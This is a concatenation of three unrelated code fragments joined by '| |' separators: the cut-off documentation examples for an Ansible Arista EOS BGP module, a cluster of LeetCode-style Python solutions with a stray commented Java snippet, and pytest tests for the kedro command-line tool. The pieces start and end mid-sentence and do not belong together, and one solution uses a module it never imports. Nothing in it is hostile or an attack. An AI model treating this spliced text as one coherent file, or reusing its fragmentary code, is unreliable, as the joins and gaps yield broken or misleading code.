module for prior cleanup.
- Refer to examples for more details.
type: str
choices: [deleted, merged, purged, replaced, gathered, rendered, parsed]
default: merged
"""
EXAMPLES = """
# Using merged
# Before state
# veos(config)#show running-config | section bgp
# veos(config)#
- name: Merge provided configuration with device configuration
arista.eos.eos_bgp_global:
config:
as_number: "100"
bgp_params:
host_routes: True
convergence:
slow_peer: True
time: 6
additional_paths: "send"
log_neighbor_changes: True
maximum_paths:
max_equal_cost_paths: 55
aggregate_address:
- address: "1.2.1.0/24"
as_set: true
match_map: "match01"
- address: "5.2.1.0/24"
attribute_map: "attrmatch01"
advertise_only: true
redistribute:
- protocol: "static"
route_map: "map_static"
- protocol: "attached-host"
distance:
internal: 50
neighbor:
- peer: "10.1.3.2"
allowas_in:
set: true
default_originate:
always: true
dont_capability_negotiate: true
export_localpref: 4000
maximum_received_routes:
count: 500
warning_limit:
limit_percent: 5
next_hop_unchanged: true
prefix_list:
name: "prefix01"
direction: "out"
- peer: "peer1"
fall_over: true
link_bandwidth:
update_delay: 5
monitoring: True
send_community:
community_attribute: "extended"
sub_attribute: "link-bandwidth"
link_bandwidth_attribute: "aggregate"
speed: "600"
vlan: 5
state: merged
# After State:
# veos(config)#show running-config | section bgp
# router bgp 100
# bgp convergence slow-peer time 6
# distance bgp 50 50 50
# maximum-paths 55
# bgp additional-paths send any
# neighbor peer1 peer-group
# neighbor peer1 link-bandwidth update-delay 5
# neighbor peer1 fall-over bfd
# neighbor peer1 monitoring
# neighbor peer1 send-community extended link-bandwidth aggregate 600
# neighbor peer1 maximum-routes 12000
# neighbor 10.1.3.2 export-localpref 4000
# neighbor 10.1.3.2 next-hop-unchanged
# neighbor 10.1.3.2 dont-capability-negotiate
# neighbor 10.1.3.2 allowas-in 3
# neighbor 10.1.3.2 default-originate always
# neighbor 10.1.3.2 maximum-routes 500 warning-limit 5 percent
# aggregate-address 1.2.1.0/24 as-set match-map match01
# aggregate-address 5.2.1.0/24 attribute-map attrmatch01 advertise-only
# redistribute static route-map map_static
# redistribute attached-host
# !
# vlan 5
# !
# address-family ipv4
# neighbor 10.1.3.2 prefix-list prefix01 out
# veos(config)#
#
# Module Execution:
#
# "after": {
# "aggregate_address": [
# {
# "address": "1.2.1.0/24",
# "as_set": true,
# "match_map": "match01"
# },
# {
# "address": "5.2.1.0/24",
# "advertise_only": true,
# "attribute_map": "attrmatch01"
# }
# ],
# "as_number": "100",
# "bgp_params": {
# "additional_paths": "send",
# "convergence": {
# "slow_peer": true,
# "time": 6
# }
# },
# "distance": {
# "external": 50,
# "internal": 50,
# "local": 50
# },
# "maximum_paths": {
# "max_equal_cost_paths": 55
# },
# "neighbor": [
# {
# "fall_over": true,
# "link_bandwidth": {
# "set": true,
# "update_delay": 5
# },
# "maximum_received_routes": {
# "count": 12000
# },
# "monitoring": true,
# "peer": "peer1",
# "peer_group": "peer1",
# "send_community": {
# "community_attribute": "extended",
# "link_bandwidth_attribute": "aggregate",
# "speed": "600",
# "sub_attribute": "link-bandwidth"
# }
# },
# {
# "allowas_in": {
# "count": 3
# },
# "default_originate": {
# "always": true
# },
# "dont_capability_negotiate": true,
# "export_localpref": 4000,
# "maximum_received_routes": {
# "count": 500,
# "warning_limit": {
# "limit_percent": 5
# }
# },
# "next_hop_unchanged": true,
# "peer": "10.1.3.2"
# }
# ],
# "redistribute": [
# {
# "protocol": "static",
# "route_map": "map_static"
# },
# {
# "protocol": "attached-host"
# }
# ],
# "vlan": 5
# },
# "before": {},
# "changed": true,
# "commands": [
# "router bgp 100",
# "neighbor 10.1.3.2 allowas-in",
# "neighbor 10.1.3.2 default-originate always",
# "neighbor 10.1.3.2 dont-capability-negotiate",
# "neighbor 10.1.3.2 export-localpref 4000",
# "neighbor 10.1.3.2 maximum-routes 500 warning-limit 5 percent",
# "neighbor 10.1.3.2 next-hop-unchanged",
# "neighbor 10.1.3.2 prefix-list prefix01 out",
# "neighbor peer1 fall-over bfd",
# "neighbor peer1 link-bandwidth update-delay 5",
# "neighbor peer1 monitoring",
# "neighbor peer1 send-community extended link-bandwidth aggregate 600",
# "redistribute static route-map map_static",
# "redistribute attached-host",
# "aggregate-address 1.2.1.0/24 as-set match-map match01",
# "aggregate-address 5.2.1.0/24 attribute-map attrmatch01 advertise-only",
# "bgp host-routes fib direct-install",
# "bgp convergence slow-peer time 6",
# "bgp additional-paths send any",
# "bgp log-neighbor-changes",
# "maximum-paths 55",
# "distance bgp 50",
# "vlan 5"
# ],
# Using replaced:
# Before state:
# veos(config)#show running-config | section bgp
# router bgp 100
# bgp convergence slow-peer time 6
# distance bgp 50 50 50
# maximum-paths 55
# bgp additional-paths send any
# neighbor peer1 peer-group
# neighbor peer1 link-bandwidth update-delay 5
# neighbor peer1 fall-over bfd
# neighbor peer1 monitoring
# neighbor peer1 send-community extended link-bandwidth aggregate 600
# neighbor peer1 maximum-routes 12000
# neighbor 10.1.3.2 export-localpref 4000
# neighbor 10.1.3.2 next-hop-unchanged
# neighbor 10.1.3.2 dont-capability-negotiate
# neighbor 10.1.3.2 allowas-in 3
# neighbor 10.1.3.2 default-originate always
# neighbor 10.1.3.2 maximum-routes 500 warning-limit 5 percent
# aggregate-address 1.2.1.0/24 as-set match-map match01
# aggregate-address 5.2.1.0/24 attribute-map attrmatch01 advertise-only
# redistribute static route-map map_static
# redistribute attached-host
# !
# vlan 5
# !
# address-family ipv4
# neighbor 10.1.3.2 prefix-list prefix01 out
# !
# vrf vrf01
# route-target import 54:11
# neighbor 192.168.3.11 dont-capability-negotiate
# neighbor 192.168.3.11 allowas-in 3
# neighbor 192.168.3.11 default-originate always
# neighbor 192.168.3.11 maximum-routes 12000
# veos(config)#
- name: replace provided configuration with device configuration
arista.eos.eos_bgp_global:
config:
as_number: "100"
bgp_params:
host_routes: True
convergence:
slow_peer: True
time: 6
additional_paths: "send"
log_neighbor_changes: True
vrfs:
- vrf: "vrf01"
maximum_paths:
max_equal_cost_paths: 55
aggregate_address:
- address: "1.2.1.0/24"
as_set: true
match_map: "match01"
- address: "5.2.1.0/24"
attribute_map: "attrmatch01"
advertise_only: true
redistribute:
- protocol: "static"
route_map: "map_static"
- protocol: "attached-host"
distance:
internal: 50
neighbor:
- peer: "10.1.3.2"
allowas_in:
set: true
default_originate:
always: true
dont_capability_negotiate: true
export_localpref: 4000
maximum_received_routes:
count: 500
warning_limit:
limit_percent: 5
next_hop_unchanged: true
prefix_list:
name: "prefix01"
direction: "out"
- peer: "peer1"
fall_over: true
link_bandwidth:
update_delay: 5
monitoring: True
send_community:
community_attribute: "extended"
sub_attribute: "link-bandwidth"
link_bandwidth_attribute: "aggregate"
speed: "600"
state: replaced
# After State:
# veos(config)#show running-config | section bgp
# router bgp 100
# bgp convergence slow-peer time 6
# bgp additional-paths send any
# !
# vrf vrf01
# distance bgp 50 50 50
# maximum-paths 55
# neighbor 10.1.3.2 export-localpref 4000
# neighbor 10.1.3.2 next-hop-unchanged
# neighbor 10.1.3.2 dont-capability-negotiate
# neighbor 10.1.3.2 allowas-in 3
# neighbor 10.1.3.2 default-originate always
# neighbor 10.1.3.2 maximum-routes 500 warning-limit 5 percent
# aggregate-address 1.2.1.0/24 as-set match-map match01
# aggregate-address 5.2.1.0/24 attribute-map attrmatch01 advertise-only
# redistribute static route-map map_static
# redistribute attached-host
# !
# address-family ipv4
# neighbor 10.1.3.2 prefix-list prefix01 out
# veos(config)#
#
#
# Module Execution:
#
# "after": {
# "as_number": "100",
# "bgp_params": {
# "additional_paths": "send",
# "convergence": {
# "slow_peer": true,
# "time": 6
# }
# },
# "vrfs": [
# {
# "aggregate_address": [
# {
# "address": "1.2.1.0/24",
# "as_set": true,
# "match_map": "match01"
# },
# {
# "address": "5.2.1.0/24",
# "advertise_only": true,
# "attribute_map": "attrmatch01"
# }
# ],
# "distance": {
# "external": 50,
# "internal": 50,
# "local": 50
# },
# "maximum_paths": {
# "max_equal_cost_paths": 55
# },
# "neighbor": [
# {
# "allowas_in": {
# "count": 3
# },
# "default_originate": {
# "always": true
# },
# "dont_capability_negotiate": true,
# "export_localpref": 4000,
# "maximum_received_routes": {
# "count": 500,
# "warning_limit": {
# "limit_percent": 5
# }
# },
# "next_hop_unchanged": true,
# "peer": "10.1.3.2"
# }
# ],
# "redistribute": [
# {
# "protocol": "static",
# "route_map": "map_static"
# },
# {
# "protocol": "attached-host"
# }
# ],
# "vrf": "vrf01"
# }
# ]
# },
# "before": {
# "aggregate_address": [
# {
# "address": "1.2.1.0/24",
# "as_set": true,
# "match_map": "match01"
# },
# {
# "address": "5.2.1.0/24",
# "advertise_only": true,
# "attribute_map": "attrmatch01"
# }
# ],
# "as_number": "100",
# "bgp_params": {
# "additional_paths": "send",
# "convergence": {
# "slow_peer": true,
# "time": 6
# }
# },
# "distance": {
# "external": 50,
# "internal": 50,
# "local": 50
# },
# "maximum_paths": {
# "max_equal_cost_paths": 55
# },
# "neighbor": [
# {
# "fall_over": true,
# "link_bandwidth": {
# "set": true,
# | |
courses.
# There may be multiple correct orders, you just need to return one of them.
# If it is impossible to finish all courses, return an empty array.
from collections import defaultdict
class Solution:
def findOrder(self, numCourses, prerequisites):
"""
:type numCourses: int
:type prerequisites: List[List[int]]
:rtype: List[int]
"""
# Prepare the graph
adj_list = defaultdict(list)
indegree = {}
for dest, src in prerequisites:
adj_list[src].append(dest)
# Record each node's in-degree
indegree[dest] = indegree.get(dest, 0) + 1
# Queue for maintainig list of nodes that have 0 in-degree
zero_indegree_queue = [k for k in range(numCourses) if k not in indegree]
topological_sorted_order = []
# Until there are nodes in the Q
while zero_indegree_queue:
# Pop one node with 0 in-degree
vertex = zero_indegree_queue.pop(0)
topological_sorted_order.append(vertex)
# Reduce in-degree for all the neighbors
if vertex in adj_list:
for neighbor in adj_list[vertex]:
indegree[neighbor] -= 1
# Add neighbor to Q if in-degree becomes 0
if indegree[neighbor] == 0:
zero_indegree_queue.append(neighbor)
return topological_sorted_order if len(topological_sorted_order) == numCourses else []
# Input: [[100, 200], [200, 1300], [1000, 1250], [2000, 3200]]
# Output: 3
# Explanation:
# There're totally 4 courses, but you can take 3 courses at most:
# First, take the 1st course, it costs 100 days so you will finish it on the 100th day, and ready to take the next course on the 101st day.
# Second, take the 3rd course, it costs 1000 days so you will finish it on the 1100th day, and ready to take the next course on the 1101st day.
# Third, take the 2nd course, it costs 200 days so you will finish it on the 1300th day.
# The 4th course cannot be taken now, since you will finish it on the 3300th day, which exceeds the closed date.
# public class Solution {
# public int scheduleCourse(int[][] courses) {
# Arrays.sort(courses, (a, b) -> a[1] - b[1]);
# PriorityQueue < Integer > queue = new PriorityQueue < > ((a, b) -> b - a);
# int time = 0;
# for (int[] c: courses) {
# if (time + c[0] <= c[1]) {
# queue.offer(c[0]);
# time += c[0];
# } else if (!queue.isEmpty() && queue.peek() > c[0]) {
# time += c[0] - queue.poll();
# queue.offer(c[0]);
# }
# }
# return queue.size();
# }
# }
# Given a string S and a string T, find the minimum window in S
# which will contain all the characters in T in complexity O(n).
# Example:
# Input: S = "ADOBECODEBANC", T = "ABC"
# Output: "BANC"
class Solution(object):
def minWindow(self, s, t):
"""
:type s: str
:type t: str
:rtype: str
"""
window_dict = collections.defaultdict(int)
t_dict = collections.Counter(t)
l, r = 0, 0
ans = (float("inf"), l, r)
formed, reqd = 0, len(t_dict)
while r < len(s):
# print(l, r, window_dict)
character = s[r]
window_dict[character] += 1
if character in t_dict and window_dict[character] == t_dict[character]:
formed += 1
# print(l, r, window_dict, formed, reqd)
while l <= r and formed == reqd:
# print(l, r, window_dict, formed, reqd)
character = s[l]
if(r-l+1 < ans[0]):
ans = (r-l+1, l, r)
window_dict[character] -= 1
if character in t_dict and window_dict[character] < t_dict[character]:
formed -= 1
l += 1
r += 1
return "" if ans[0] == float("inf") else s[ans[1]:ans[2]+1]
# Serialize and Deserialize BST
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Codec:
def serialize(self, root):
"""Encodes a tree to a single string.
:type root: TreeNode
:rtype: str
"""
if root == None:
return "None"
return str(root.val) + "," + self.serialize(root.left) + "," + self.serialize(root.right)
def deserialize(self, data):
"""Decodes your encoded data to tree.
:type data: str
:rtype: TreeNode
"""
nodes = data.split(",")
def _deserialize(nodelist):
if nodelist[0] == "None":
nodelist.pop(0)
return None
root = TreeNode(nodelist.pop(0))
# this is the key here - pop after creating node
root.left = _deserialize(nodelist)
root.right = _deserialize(nodelist)
return root
t = _deserialize(nodes)
return t
# Your Codec object will be instantiated and called as such:
# codec = Codec()
# codec.deserialize(codec.serialize(root))
# Serialize and Deserialize Binary Tree
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Codec:
def serialize(self, root):
"""Encodes a tree to a single string.
:type root: TreeNode
:rtype: str
"""
if root == None:
return "None"
return str(root.val) + "," + self.serialize(root.left) + "," + self.serialize(root.right)
def deserialize(self, data):
"""Decodes your encoded data to tree.
:type data: str
:rtype: TreeNode
"""
def dfs(data_list):
if data_list[0] == "None":
data_list.pop(0)
return None
t1 = TreeNode(data_list.pop(0))
t1.left = dfs(data_list)
t1.right = dfs(data_list)
return t1
return dfs(data.split(","))
# Your Codec object will be instantiated and called as such:
# codec = Codec()
# codec.deserialize(codec.serialize(root))
# Integer to English Words
# Input: 123
# Output: "One Hundred Twenty Three"
class Solution(object):
def numberToWords(self, num):
"""
:type num: int
:rtype: str
"""
def tens(num):
if not num:
return ""
elif num < 10:
return ones[num]
elif num < 20:
return tens_one[num]
else:
tenner = num //10
rest = num - tenner*10
#when calculating rest no need to divide
return tens_norm[tenner] + " " + ones[rest] if rest else tens_norm[tenner]
def toWords(num):
# print(num)
hundred = num // 100
rest = num - hundred * 100
#when calculating rest no need to divide
if hundred and rest:
return ones[hundred] + " Hundred " + tens(rest)
elif hundred and not rest:
return ones[hundred] + " Hundred"
else:
return tens(rest)
ones = {1: "One", 2: "Two", 3: "Three", 4: "Four", 5: "Five", 6: "Six", 7: "Seven", 8: "Eight", 9: "Nine"}
tens_norm = {2: "Twenty", 3: "Thirty", 4: "Forty", 5: "Fifty", 6: "Sixty", 7: "Seventy", 8: "Eighty", 9: "Ninety"}
tens_one = {10: "Ten", 11: "Eleven", 12: "Twelve", 13: "Thirteen", 14: "Fourteen", 15: "Fifteen", 16: "Sixteen", 17: "Seventeen", 18: "Eighteen", 19: "Nineteen"}
#split
billion = num//(10**9)
million = (num - billion*10**9)//(10**6)
thousand = (num - billion * 10**9 - million * 10**6)//1000
rest = num - billion*(10**9) - (million*10**6) - (thousand*1000)
if not num:
return "Zero"
result = ""
if billion:
result += toWords(billion) + " Billion"
if million:
result += " " if result else ""
result += toWords(million) + " Million"
if thousand:
result += " " if result else ""
result += toWords(thousand) + " Thousand"
if rest:
result += " " if result else ""
result += toWords(rest)
return result
# Search in Rotated Sorted Array
# Suppose an array sorted in ascending order is rotated at some pivot unknown to you beforehand.
# (i.e., [0,1,2,4,5,6,7] might become [4,5,6,7,0,1,2]).
class Solution(object):
def search(self, nums, target):
"""
:type nums: List[int]
:type target: int
:rtype: int
"""
def find_pivot(left, right):
# 4 5 6 7 8 9 2
# the nums[0] is always
# greater than nums[-1]
# in case of pivoted array
if nums[left] < nums[right]:
return 0
while left <= right:
pivot = (left + right) // 2
if nums[pivot] > nums[pivot+1]:
# we're basically finding
# an anomaly where nums[i] > nums[i+1]
return pivot +1
else:
if nums[pivot] < nums[left]:
# restrict search to left side
# aka put right to p-1
right = pivot -1
else:
left = pivot +1
def search(left, right):
while left<= right:
pivot = (left + right)//2
if nums[pivot] == target:
return pivot
elif nums[pivot] < target:
left = pivot + 1
else:
right = pivot - 1
return -1
N = len(nums)
if N == 0:
return -1
if N == 1:
return 0 if nums[0] == target else -1
pivot = find_pivot(0, len(nums)-1)
if nums[pivot] == target:
return pivot
if pivot == 0:
return search(0, N-1)
if target < nums[0]:
return search(pivot, N-1)
return search(0, pivot)
# Given a matrix of M x N elements (M rows, N columns),
# return all elements of the matrix in | |
<reponame>ANA-POTJE/kedro
# Copyright 2020 QuantumBlack Visual Analytics Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, AND
# NONINFRINGEMENT. IN NO EVENT WILL THE LICENSOR OR OTHER CONTRIBUTORS
# BE LIABLE FOR ANY CLAIM, DAMAGES, OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF, OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
# The QuantumBlack Visual Analytics Limited ("QuantumBlack") name and logo
# (either separately or in combination, "QuantumBlack Trademarks") are
# trademarks of QuantumBlack. The License does not grant you any right or
# license to the QuantumBlack Trademarks. You may not use the QuantumBlack
# Trademarks or any confusingly similar mark as a trademark for your product,
# or use the QuantumBlack Trademarks in any other manner that might cause
# confusion in the marketplace, including but not limited to in advertising,
# on websites, or on software.
#
# See the License for the specific language governing permissions and
# limitations under the License.
# pylint: disable=unused-argument
import os
import subprocess
import sys
from pathlib import Path
from tempfile import NamedTemporaryFile
import anyconfig
import pytest
from click.testing import CliRunner
from kedro.context import KEDRO_ENV_VAR
from kedro.runner import ParallelRunner, SequentialRunner
@pytest.fixture(autouse=True)
def call_mock(mocker, fake_kedro_cli):
return mocker.patch.object(fake_kedro_cli, "call")
@pytest.fixture(autouse=True)
def python_call_mock(mocker, fake_kedro_cli):
return mocker.patch.object(fake_kedro_cli, "python_call")
@pytest.fixture()
def fake_ipython_message(mocker, fake_kedro_cli):
return mocker.patch.object(fake_kedro_cli, "ipython_message")
class TestActivateNbstripoutCommand:
@staticmethod
@pytest.fixture()
def fake_nbstripout():
"""
``nbstripout`` tries to access ``sys.stdin.buffer.readable``
on import, but it's patches by pytest.
Let's replace it by the fake!
"""
sys.modules["nbstripout"] = "fake"
yield
del sys.modules["nbstripout"]
@staticmethod
@pytest.fixture
def fake_git_repo(mocker):
return mocker.patch("subprocess.run", return_value=mocker.Mock(returncode=0))
@staticmethod
@pytest.fixture
def without_git_repo(mocker):
return mocker.patch("subprocess.run", return_value=mocker.Mock(returncode=1))
def test_install_successfully(
self, fake_kedro_cli, call_mock, fake_nbstripout, fake_git_repo
):
result = CliRunner().invoke(fake_kedro_cli.cli, ["activate-nbstripout"])
assert not result.exit_code
call_mock.assert_called_once_with(["nbstripout", "--install"])
fake_git_repo.assert_called_once_with(
["git", "rev-parse", "--git-dir"],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
def test_nbstripout_not_installed(self, fake_kedro_cli, fake_git_repo, mocker):
"""
Run activate-nbstripout target without nbstripout installed
There should be a clear message about it.
"""
mocker.patch.dict("sys.modules", {"nbstripout": None})
result = CliRunner().invoke(fake_kedro_cli.cli, ["activate-nbstripout"])
assert result.exit_code
assert "nbstripout is not installed" in result.stdout
def test_no_git_repo(self, fake_kedro_cli, fake_nbstripout, without_git_repo):
"""
Run activate-nbstripout target with no git repo available.
There should be a clear message about it.
"""
result = CliRunner().invoke(fake_kedro_cli.cli, ["activate-nbstripout"])
assert result.exit_code
assert "Not a git repository" in result.stdout
class TestRunCommand:
@staticmethod
@pytest.fixture(autouse=True)
def fake_load_context(mocker, fake_kedro_cli):
context = mocker.Mock()
yield mocker.patch.object(fake_kedro_cli, "load_context", return_value=context)
@staticmethod
@pytest.fixture(params=["run_config.yml", "run_config.json"])
def fake_run_config(request, fake_root_dir):
config_path = str(fake_root_dir / request.param)
anyconfig.dump(
{
"run": {
"pipeline": "pipeline1",
"tag": ["tag1", "tag2"],
"node_names": ["node1", "node2"],
}
},
config_path,
)
return config_path
@staticmethod
@pytest.fixture()
def fake_run_config_with_params(fake_run_config, request):
config = anyconfig.load(fake_run_config)
config["run"].update(request.param)
anyconfig.dump(config, fake_run_config)
return fake_run_config
def test_run_successfully(self, fake_kedro_cli, fake_load_context, mocker):
result = CliRunner().invoke(fake_kedro_cli.cli, ["run"])
assert not result.exit_code
fake_load_context.return_value.run.assert_called_once_with(
tags=(),
runner=mocker.ANY,
node_names=(),
from_nodes=[],
to_nodes=[],
from_inputs=[],
load_versions={},
pipeline_name=None,
)
assert isinstance(
fake_load_context.return_value.run.call_args_list[0][1]["runner"],
SequentialRunner,
)
def test_with_sequential_runner_and_parallel_flag(
self, fake_kedro_cli, fake_load_context
):
result = CliRunner().invoke(
fake_kedro_cli.cli, ["run", "--parallel", "--runner=SequentialRunner"]
)
assert result.exit_code
assert "Please use either --parallel or --runner" in result.stdout
fake_load_context.return_value.run.assert_not_called()
def test_run_successfully_parallel_via_flag(
self, fake_kedro_cli, fake_load_context, mocker
):
result = CliRunner().invoke(fake_kedro_cli.cli, ["run", "--parallel"])
assert not result.exit_code
fake_load_context.return_value.run.assert_called_once_with(
tags=(),
runner=mocker.ANY,
node_names=(),
from_nodes=[],
to_nodes=[],
from_inputs=[],
load_versions={},
pipeline_name=None,
)
assert isinstance(
fake_load_context.return_value.run.call_args_list[0][1]["runner"],
ParallelRunner,
)
def test_run_successfully_parallel_via_name(
self, fake_kedro_cli, fake_load_context
):
result = CliRunner().invoke(
fake_kedro_cli.cli, ["run", "--runner=ParallelRunner"]
)
assert not result.exit_code
assert isinstance(
fake_load_context.return_value.run.call_args_list[0][1]["runner"],
ParallelRunner,
)
@pytest.mark.parametrize("config_flag", ["--config", "-c"])
def test_run_with_config(
self, config_flag, fake_kedro_cli, fake_load_context, fake_run_config, mocker
):
result = CliRunner().invoke(
fake_kedro_cli.cli, ["run", config_flag, fake_run_config]
)
assert not result.exit_code
fake_load_context.return_value.run.assert_called_once_with(
tags=("tag1", "tag2"),
runner=mocker.ANY,
node_names=("node1", "node2"),
from_nodes=[],
to_nodes=[],
from_inputs=[],
load_versions={},
pipeline_name="pipeline1",
)
@pytest.mark.parametrize(
"fake_run_config_with_params,expected",
[
({}, {}),
({"params": {"foo": "baz"}}, {"foo": "baz"}),
({"params": "foo:baz"}, {"foo": "baz"}),
({"params": {"foo": "123.45", "baz": "678", "bar": 9}}, {"foo": "123.45", "baz": "678", "bar": 9}),
],
indirect=["fake_run_config_with_params"],
)
def test_run_with_params_in_config(
self,
expected,
fake_kedro_cli,
fake_load_context,
fake_run_config_with_params,
mocker,
):
result = CliRunner().invoke(
fake_kedro_cli.cli, ["run", "-c", fake_run_config_with_params]
)
assert not result.exit_code
fake_load_context.return_value.run.assert_called_once_with(
tags=("tag1", "tag2"),
runner=mocker.ANY,
node_names=("node1", "node2"),
from_nodes=[],
to_nodes=[],
from_inputs=[],
load_versions={},
pipeline_name="pipeline1",
)
fake_load_context.assert_called_once_with(
Path.cwd(), env=mocker.ANY, extra_params=expected
)
def test_run_env_environment_var(
self, fake_kedro_cli, fake_load_context, fake_repo_path, monkeypatch, mocker
):
monkeypatch.setenv("KEDRO_ENV", "my_special_env")
result = CliRunner().invoke(fake_kedro_cli.cli, ["run"])
assert not result.exit_code
fake_load_context.assert_called_once_with(
Path.cwd(), env="my_special_env", extra_params=mocker.ANY
)
@pytest.mark.parametrize(
"cli_arg,expected_extra_params",
[
("foo:bar", {"foo": "bar"}),
(
"foo:123.45, bar:1a,baz:678. ,qux:1e-2,quux:0,quuz:",
{
"foo": 123.45,
"bar": "1a",
"baz": 678,
"qux": 0.01,
"quux": 0,
"quuz": "",
},
),
("foo:bar,baz:fizz:buzz", {"foo": "bar", "baz": "fizz:buzz"}),
(
"foo:bar, baz: https://example.com",
{"foo": "bar", "baz": "https://example.com"},
),
("foo:bar,baz:fizz buzz", {"foo": "bar", "baz": "fizz buzz"}),
("foo:bar, foo : fizz buzz ", {"foo": "fizz buzz"}),
],
)
def test_run_extra_params(
self, mocker, fake_kedro_cli, fake_load_context, cli_arg, expected_extra_params
):
result = CliRunner().invoke(fake_kedro_cli.cli, ["run", "--params", cli_arg])
assert not result.exit_code
fake_load_context.assert_called_once_with(
Path.cwd(), env=mocker.ANY, extra_params=expected_extra_params
)
@pytest.mark.parametrize("bad_arg", ["bad", "foo:bar,bad"])
def test_bad_extra_params(self, fake_kedro_cli, fake_load_context, bad_arg):
result = CliRunner().invoke(fake_kedro_cli.cli, ["run", "--params", bad_arg])
assert result.exit_code
assert (
"Item `bad` must contain a key and a value separated by `:`"
in result.stdout
)
@pytest.mark.parametrize("bad_arg", [":", ":value", " :value"])
def test_bad_params_key(self, fake_kedro_cli, fake_load_context, bad_arg):
result = CliRunner().invoke(fake_kedro_cli.cli, ["run", "--params", bad_arg])
assert result.exit_code
assert "Parameter key cannot be an empty string" in result.stdout
class TestTestCommand:
def test_happy_path(self, fake_kedro_cli, python_call_mock):
result = CliRunner().invoke(
fake_kedro_cli.cli, ["test", "--random-arg", "value"]
)
assert not result.exit_code
python_call_mock.assert_called_once_with("pytest", ("--random-arg", "value"))
def test_pytest_not_installed(self, fake_kedro_cli, python_call_mock, mocker):
mocker.patch.dict("sys.modules", {"pytest": None})
result = CliRunner().invoke(
fake_kedro_cli.cli, ["test", "--random-arg", "value"]
)
expected_message = fake_kedro_cli.NO_DEPENDENCY_MESSAGE.format("pytest")
assert result.exit_code
assert expected_message in result.stdout
python_call_mock.assert_not_called()
class TestLintCommand:
def test_bare_lint(self, fake_kedro_cli, python_call_mock, mocker):
result = CliRunner().invoke(fake_kedro_cli.cli, ["lint"])
assert not result.exit_code
files = ("src/tests", "src/fake_package")
expected_calls = [
mocker.call("flake8", ("--max-line-length=88",) + files),
mocker.call(
"isort", ("-rc", "-tc", "-up", "-fgw=0", "-m=3", "-w=88") + files
),
]
if sys.version_info[:2] >= (3, 6):
expected_calls.append(mocker.call("black", files)) # pragma: no cover
assert python_call_mock.call_args_list == expected_calls
def test_file_lint(self, fake_kedro_cli, python_call_mock, mocker):
result = CliRunner().invoke(fake_kedro_cli.cli, ["lint", "kedro"])
assert not result.exit_code
files = ("kedro",)
expected_calls = [
mocker.call("flake8", ("--max-line-length=88",) + files),
mocker.call(
"isort", ("-rc", "-tc", "-up", "-fgw=0", "-m=3", "-w=88") + files
),
]
if sys.version_info[:2] >= (3, 6):
expected_calls.append(mocker.call("black", files)) # pragma: no cover
assert python_call_mock.call_args_list == expected_calls
@pytest.mark.parametrize("module_name", ["flake8", "isort"])
def test_import_not_installed(
self, fake_kedro_cli, python_call_mock, module_name, mocker
):
mocker.patch.dict("sys.modules", {module_name: None})
result = CliRunner().invoke(fake_kedro_cli.cli, ["lint"])
expected_message = fake_kedro_cli.NO_DEPENDENCY_MESSAGE.format(module_name)
assert result.exit_code
assert expected_message in result.stdout
python_call_mock.assert_not_called()
class TestInstallCommand:
def test_happy_path(self, python_call_mock, call_mock, fake_kedro_cli):
result = CliRunner().invoke(fake_kedro_cli.cli, ["install"])
assert not result.exit_code
python_call_mock.assert_called_once_with(
"pip", ["install", "-U", "-r", "src/requirements.txt"]
)
call_mock.assert_not_called()
def test_with_env_file(self, python_call_mock, call_mock, fake_kedro_cli, mocker):
# Pretend env file exists:
mocker.patch.object(Path, "is_file", return_value=True)
result = CliRunner().invoke(fake_kedro_cli.cli, ["install"])
assert not result.exit_code, result.stdout
python_call_mock.assert_called_once_with(
"pip", ["install", "-U", "-r", "src/requirements.txt"]
)
call_mock.assert_called_once_with(
["conda", "install", "--file", "src/environment.yml", "--yes"]
)
def test_windows(self, fake_kedro_cli, mocker):
mock_subprocess = mocker.patch.object(fake_kedro_cli, "subprocess")
# pretend we are on Windows
mocker.patch.object(fake_kedro_cli, "os").name = "nt"
result = CliRunner().invoke(fake_kedro_cli.cli, ["install"])
assert not result.exit_code, result.stdout
command = [
sys.executable,
"-m",
"pip",
"install",
"-U",
"-r",
"src/requirements.txt",
]
mock_subprocess.Popen.assert_called_once_with(
command, creationflags=mock_subprocess.CREATE_NEW_CONSOLE
)
class TestIpythonCommand:
def test_happy_path(self, call_mock, fake_kedro_cli, fake_ipython_message):
result = CliRunner().invoke(
fake_kedro_cli.cli, ["ipython", "--random-arg", "value"]
)
assert not result.exit_code, result.stdout
fake_ipython_message.assert_called_once_with()
call_mock.assert_called_once_with(["ipython", "--random-arg", "value"])
@pytest.mark.parametrize("help_flag", ["-h", "--help"])
def test_help(self, help_flag, call_mock, fake_kedro_cli, fake_ipython_message):
result = CliRunner().invoke(fake_kedro_cli.cli, ["ipython", help_flag])
assert not result.exit_code, result.stdout
fake_ipython_message.assert_not_called()
call_mock.assert_called_once_with(["ipython", help_flag])
class TestPackageCommand:
def test_happy_path(self, call_mock, fake_kedro_cli, mocker):
result = CliRunner().invoke(fake_kedro_cli.cli, ["package"])
assert not result.exit_code, result.stdout
call_mock.assert_has_calls(
[
mocker.call(
[sys.executable, "setup.py", "clean", "--all", "bdist_egg"],
cwd="src",
),
mocker.call(
[sys.executable, "setup.py", "clean", "--all", "bdist_wheel"],
cwd="src",
),
]
)
class TestBuildDocsCommand:
def test_happy_path(self, call_mock, python_call_mock, fake_kedro_cli, mocker):
fake_rmtree = mocker.patch("shutil.rmtree")
result = CliRunner().invoke(fake_kedro_cli.cli, ["build-docs"])
assert not result.exit_code, result.stdout
call_mock.assert_has_calls(
[
mocker.call(
[
"sphinx-apidoc",
"--module-first",
"-o",
"docs/source",
"src/fake_package",
]
),
mocker.call(
["sphinx-build", "-M", "html", "docs/source", "docs/build", "-a"]
),
]
)
python_call_mock.assert_has_calls(
[
